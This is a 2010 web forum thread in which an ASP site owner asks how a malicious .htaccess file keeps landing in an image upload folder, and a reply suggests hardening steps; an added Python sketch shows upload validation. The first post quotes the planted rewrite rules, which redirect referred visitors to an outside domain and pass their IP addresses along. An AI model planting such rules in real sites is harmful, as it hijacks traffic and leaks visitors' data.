Write access on upload folder creates security vulnerability

How do I secure folder while still allowing uploads


2 Replies - 2160 Views - Last Post: 28 December 2010 - 04:52 PM

#1 RedRocky

Posted 27 December 2010 - 11:19 AM

I have an ASP web site, on a Windows server, that allows users to upload image files after logging into a control panel.

To do this, write access is enabled on the folder that the images are uploaded to. This has worked fine for a long time.

However I recently discovered that a malicious .htaccess file had been uploaded to this folder. The file was not uploaded using my form for uploading images.

This .htaccess was preventing the uploaded images from being viewed on the web site with the following code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}


If I deleted the file, it would soon reappear.

How can I fix this problem, so that users can continue to upload images after logging into my control panel, but malicious files like this cannot be uploaded?

I understand that allowing write access on a folder means that this is a potential issue, but how do they actually upload the file? What type of program are they using? How do you do an HTTP upload without using a file on the server? To upload images normally, users have to use the ASP code I wrote which sits on the server.


Replies To: Write access on upload folder creates security vulnerability

#2 Martyr2

Posted 27 December 2010 - 12:04 PM

It is all about WHO has write access. When you set up a website that does uploads, you typically give ASP or PHP or whatever server side language its own user account. This means that only the website itself can write to that folder, no one else. Then, you make sure that no form on your site other than your upload form can access that folder. Then on your upload form you write server-side code that properly validates the file types allowed to be uploaded. For instance if you check image extensions for .jpg, .gif, .png, .bmp and reject all else, then you can't upload .htaccess.

Also I typically like to make the upload directory a cryptic name too that is not easily recognizable and appears nowhere in code that a client could see. Then the last trick is to make this upload folder one directory up from your web root. ASP/PHP can still access it, but no user can actually navigate to the folder since it is not in the web root.

What I mean by web root is that if all users accessing your site start in /users/a/html then put your uploads folder in /users/a and they won't be able to navigate up out of /html to get to it.

Hope these tricks help secure your uploads. :)

This post has been edited by Martyr2: 27 December 2010 - 12:05 PM

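Added example, not part of the original thread or any poster's code: a sketch of the server-side check described in reply #2, written in Python as a stand-in for the ASP upload handler. The function name `store_upload`, the random stored filename and the leading-bytes check are assumptions that go beyond the extension allowlist the reply describes.

```python
import os
import secrets
import tempfile
from pathlib import Path

# Extensions the reply allows, mapped to the bytes each format starts with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".bmp": (b"BM",),
}


class RejectedUpload(ValueError):
    """Raised when an upload fails validation; nothing is written to disk."""


def store_upload(client_name: str, data: bytes, upload_dir: Path) -> Path:
    """Validate an upload, then save it under a server-chosen name."""
    # upload_dir is assumed to sit outside the web root, as the reply suggests.
    # Keep only the last path component; clients may send "C:\\x\\a.jpg" or "../a.jpg".
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # splitext treats a leading-dot name such as ".htaccess" as having no extension.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise RejectedUpload(f"extension not allowed: {base!r}")
    if not data.startswith(ALLOWED[ext]):
        raise RejectedUpload(f"content is not a {ext} image: {base!r}")
    # The client never controls the stored filename.
    target = upload_dir / (secrets.token_hex(16) + ext)
    with open(target, "xb") as fh:  # "x" mode refuses to overwrite an existing file
        fh.write(data)
    return target


if __name__ == "__main__":
    folder = Path(tempfile.mkdtemp())  # stand-in for the real upload folder
    # Constructed sample uploads: (client filename, file bytes).
    samples = [("photo.PNG", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
               (".htaccess", b"RewriteEngine On\n"),
               ("pic.jpg", b"RewriteEngine On\n")]
    for name, body in samples:
        try:
            print(name, "->", store_upload(name, body, folder).name)
        except RejectedUpload as err:
            print(name, "-> rejected:", err)
```

This only covers files that arrive through the upload form; it does not address files written to the folder by another route, which is the case reported in post #3.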

#3 RedRocky

Posted 28 December 2010 - 04:52 PM

Hi, thanks for your reply. I just want to emphasise that the malicious .htaccess files are not being uploaded using my upload form. They are getting on to the server some other way.
Any further thoughts are most welcome.
Thanks.